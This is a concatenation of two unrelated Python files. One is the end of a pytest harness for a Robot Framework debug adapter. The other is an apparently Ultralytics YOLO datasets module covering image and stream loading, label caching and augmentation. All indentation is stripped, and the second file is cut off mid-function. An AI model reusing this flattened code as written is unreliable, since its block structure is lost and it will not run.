def get_variables_response(self, variables_reference, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import VariablesRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import (
VariablesArguments,
)
variables_request = self.write(
VariablesRequest(VariablesArguments(variables_reference, format=fmt))
)
variables_response = self.wait_for_response(variables_request)
assert variables_response.success == success
return variables_response
def evaluate(self, expression, frameId=None, context=None, fmt=None, success=True):
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateRequest
from robocorp_ls_core.debug_adapter_core.dap.dap_schema import EvaluateArguments
eval_request = self.write(
EvaluateRequest(
EvaluateArguments(
expression, frameId=frameId, context=context, format=fmt
)
)
)
eval_response = self.wait_for_response(eval_request)
assert (
eval_response.success == success
), "Expected success to be: %s (found: %s).\nMessage:\n%s" % (
success,
eval_response.success,
eval_response.to_dict(),
)
return eval_response
@pytest.fixture(scope="session")
def dap_resources_dir(tmpdir_factory):
from robocorp_ls_core.copytree import copytree_dst_exists
basename = u"dap áéíóú"
copy_to = str(tmpdir_factory.mktemp(basename))
f = __file__
original_resources_dir = os.path.join(os.path.dirname(f), u"_dap_resources")
assert os.path.exists(original_resources_dir)
copytree_dst_exists(original_resources_dir, copy_to)
resources_dir = copy_to
assert os.path.exists(resources_dir)
return resources_dir
@pytest.fixture
def debugger_api_core(dap_resources_dir):
return _DebuggerAPI(dap_resources_dir=dap_resources_dir)
@pytest.fixture
def debugger_api(dap_process, dap_resources_dir):
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import writer_thread
from robocorp_ls_core.debug_adapter_core.debug_adapter_threads import reader_thread
write_to = dap_process.stdin
read_from = dap_process.stdout
write_queue = queue.Queue()
read_queue = queue.Queue()
writer = threading.Thread(
target=writer_thread, args=(write_to, write_queue), name="Debugger API writer"
)
writer.daemon = True
reader = threading.Thread(
target=reader_thread,
args=(read_from, read_queue.put, read_queue),
name="Debugger API reader",
)
reader.daemon = True
reader.start()
writer.start()
return _DebuggerAPI(
reader=reader,
writer=writer,
write_queue=write_queue,
read_queue=read_queue,
dap_resources_dir=dap_resources_dir,
)
class RunRobotThread(threading.Thread):
def __init__(self, dap_logs_dir):
threading.Thread.__init__(self)
self.target = None
self.dap_logs_dir = dap_logs_dir
self.result_code = None
self.result_event = threading.Event()
def run(self):
import robot # type: ignore
code = robot.run_cli(
[
"--outputdir=%s" % (self.dap_logs_dir,),
"--listener=robotframework_debug_adapter.listeners.DebugListener",
"--listener=robotframework_debug_adapter.listeners.DebugListenerV2",
self.target,
],
exit=False,
)
self.result_code = code
def run_target(self, target):
self.target = target
self.start()
@pytest.fixture
def robot_thread(dap_logs_dir):
"""
Fixture for interacting with the debugger api through a thread.
"""
t = RunRobotThread(dap_logs_dir)
yield t
dbg_wait_for(
lambda: t.result_code is not None,
msg="Robot execution did not finish properly.",
)
def dbg_wait_for(condition, msg=None, timeout=DEFAULT_TIMEOUT, sleep=1 / 20.0):
from robocorp_ls_core.basic import wait_for_condition
if "pydevd" in sys.modules:
timeout = sys.maxsize
wait_for_condition(condition, msg, timeout, sleep)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils import xyxy2xywh, xywh2xyxy
help_url = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
vid_formats = ['.mov', '.avi', '.mp4', '.mpg', '.mpeg', '.m4v', '.wmv', '.mkv']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in %s. Supported formats are:\nimages: %s\nvideos: %s' % \
(path, img_formats, vid_formats)
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416):
self.img_size = img_size
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416):
self.mode = 'images'
self.img_size = img_size
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
# check for common shapes
s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0) # inference shapes
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB, to bsx3x416x416
img = np.ascontiguousarray(img)
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, pad=0.0):
try:
path = str(Path(path)) # os-agnostic
parent = str(Path(path).parent) + os.sep
if os.path.isfile(path): # file
with open(path, 'r') as f:
f = f.read().splitlines()
f = [x.replace('./', parent) if x.startswith('./') else x for x in f] # local to global path
elif os.path.isdir(path): # folder
f = glob.iglob(path + os.sep + '*.*')
else:
raise Exception('%s does not exist' % path)
self.img_files = [x.replace('/', os.sep) for x in f if os.path.splitext(x)[-1].lower() in img_formats]
except:
raise Exception('Error loading data from %s. See %s' % (path, help_url))
n = len(self.img_files)
assert n > 0, 'No images found in %s. See %s' % (path, help_url)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.n = n # number of images
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Read image shapes (wh)
sp = path.replace('.txt', '') + '.shapes' # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
self.shapes = np.array(s, dtype=np.float64)
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.img_files = [self.img_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / 32. + pad).astype(np.int) * 32
# Cache labels
self.imgs = [None] * n
self.labels = [np.zeros((0, 5), dtype=np.float32)] * n
create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
nm, nf, ne, ns, nd = 0, 0, 0, 0, 0 # number missing, found, empty, datasubset, duplicate
np_labels_path = str(Path(self.label_files[0]).parent) + '.npy' # saved labels in *.npy file
if os.path.isfile(np_labels_path):
s = np_labels_path # print string
x = np.load(np_labels_path, allow_pickle=True)
if len(x) == n:
self.labels = x
labels_loaded = True
else:
s = path.replace('images', 'labels')
pbar = tqdm(self.label_files)
for i, file in enumerate(pbar):
if labels_loaded:
l = self.labels[i]
# np.savetxt(file, l, '%g') # save *.txt from *.npy file
else:
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
if np.unique(l, axis=0).shape[0] < l.shape[0]: # duplicate rows
nd += 1 # print('WARNING: duplicate rows in %s' % self.label_files[i]) # duplicate rows
if single_cls:
l[:, 0] = 0 # force dataset into single-class mode
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w = img.shape[:2]
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * [w, h, w, h] # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # print('empty labels for image %s' % self.img_files[i]) # file empty
# os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i])) # remove
pbar.desc = 'Caching labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
s, nf, nm, ne, nd, n)
assert nf > 0 or n == 20288, 'No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
if not labels_loaded and n > 1000:
print('Saving labels to %s for faster future loading' % np_labels_path)
np.save(np_labels_path, self.labels) # save for next time
# Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
if cache_images: # if training
gb = 0 # Gigabytes of cached images
pbar = tqdm(range(len(self.img_files)), desc='Caching images')
self.img_hw0, self.img_hw = [None] * n, [None] * n
for i in pbar: # max 10k images
self.imgs[i], self.img_hw0[i], self.img_hw[i] = load_image(self, i) # img, hw_original, hw_resized
gb += self.imgs[i].nbytes
pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
hyp = self.hyp
if self.mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
shapes = None
else:
# Load image
img, (h0, w0), (h, w) = load_image(self, index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
x = self.labels[index]
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0] # pad width
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1] # pad height
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]
if self.augment:
# Augment imagespace
if not self.mosaic:
img, labels = random_affine(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'])
# Augment colorspace
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
def load_image(self, index):
# loads 1 image from dataset, returns img, original hw, resized hw
img = self.imgs[index]
if img is None: # not cached
path = self.img_files[index]
img = cv2.imread(path) # BGR
assert img is not None, 'Image Not Found ' + path
h0, w0 = img.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # resize image to img_size
if r != 1: # always resize down, only resize up if training with augmentation
interp = cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR
img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
return img, (h0, w0), img.shape[:2] # img, hw_original, hw_resized
else:
return self.imgs[index], self.img_hw0[index], self.img_hw[index] # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
r = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1 # random gains
hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
dtype = img.dtype # uint8
x = np.arange(0, 256, dtype=np.int16)
lut_hue = ((x * r[0]) % 180).astype(dtype)
lut_sat = np.clip(x * r[1], 0, 255).astype(dtype)
lut_val = np.clip(x * r[2], 0, 255).astype(dtype)
img_hsv = cv2.merge((cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))).astype(dtype)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# Histogram equalization
# if random.random() < 0.2:
# for i in range(3):
# img[:, :, i] = cv2.equalizeHist(img[:, :, i])
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = load_image(self, index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
x = self.labels[index]
labels = x.copy()
if x.size > 0: # Normalized xywh to pixel xyxy format
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
labels4.append(labels)
# Concat/clip labels
if len(labels4):
labels4 = np.concatenate(labels4, 0)
# np.clip(labels4[:, 1:] - s / 2, 0, s, out=labels4[:, 1:]) # use with center crop
np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:]) # use with random_affine
# Augment
# img4 = img4[s // 2: int(s * 1.5), s // 2:int(s * 1.5)] # center crop (WARNING, requires box pruning)
img4, labels4 = random_affine(img4, labels4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
border=-s // 2) # border to remove
return img4, labels4
def letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
# Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
new_shape = (new_shape, new_shape)
# Scale ratio (new / old)
r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
if not scaleup: # only scale down, do not scale up (for better test mAP)
r = min(r, 1.0)
# Compute padding
ratio = r, r # width, height ratios
new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding
if auto: # minimum rectangle
dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding
elif scaleFill: # stretch
dw, dh = 0.0, 0.0
new_unpad = new_shape
ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios
dw /= 2 # divide padding into 2 sides
dh /= 2
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, (dw, dh)
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10, border=0):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
# targets = [cls, xyxy]
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
# s = 2 ** random.uniform(-scale, scale)
R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
# Combined rotation matrix
M = S @ T @ R # ORDER IS IMPORTANT HERE!!
if (border != 0) or (M != np.eye(3)).any(): # image changed
img = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_LINEAR, borderValue=(114, 114, 114))
# Transform label coordinates
n = len(targets)
if n:
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
area0 = (targets[:, 3] - targets[:, 1]) * (targets[:, 4] - targets[:, 2])
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16)) # aspect ratio
i = (w > 4) & (h > 4) & (area / (area0 * s + 1e-16) > 0.2) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return img, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
image[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)]
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.60] # remove >60% obscured labels
return labels
def reduce_img_size(path='../data/sm4/images', img_size=1024): # from utils.datasets import *; reduce_img_size()
# creates a new ./images_reduced folder with reduced size images of maximum size img_size
path_new = path + '_reduced' # reduced images path
create_folder(path_new)
for f in tqdm(glob.glob('%s/*.*' % path)):
try:
img = cv2.imread(f)
h, w = img.shape[:2]
r = img_size / max(h, w) # size ratio
if r < 1.0:
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_AREA) # _LINEAR fastest
fnew = f.replace(path, path_new) # .replace(Path(f).suffix, '.jpg')
cv2.imwrite(fnew, img)
except:
print('WARNING: image failure %s' % f)
def convert_images2bmp(): # from utils.datasets import *; convert_images2bmp()
# Save images
formats = [x.lower() for x in img_formats] + [x.upper() for x in img_formats]
# for path in ['../coco/images/val2014', '../coco/images/train2014']:
for path in ['../data/sm4/images', '../data/sm4/background']:
create_folder(path + 'bmp')
for ext in formats: # ['.bmp', '.jpg', '.jpeg', '.png', '.tif', '.dng']
for f in tqdm(glob.glob('%s/*%s' % (path, ext)), desc='Converting %s' % ext):
cv2.imwrite(f.replace(ext.lower(), '.bmp').replace(path, path + 'bmp'), cv2.imread(f))
# Save labels
# for path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
for file in ['../data/sm4/out_train.txt', '../data/sm4/out_test.txt']:
with open(file, 'r') as f:
lines = f.read()
# lines = f.read().replace('2014/', '2014bmp/') # coco
lines = lines.replace('/images', '/imagesbmp')
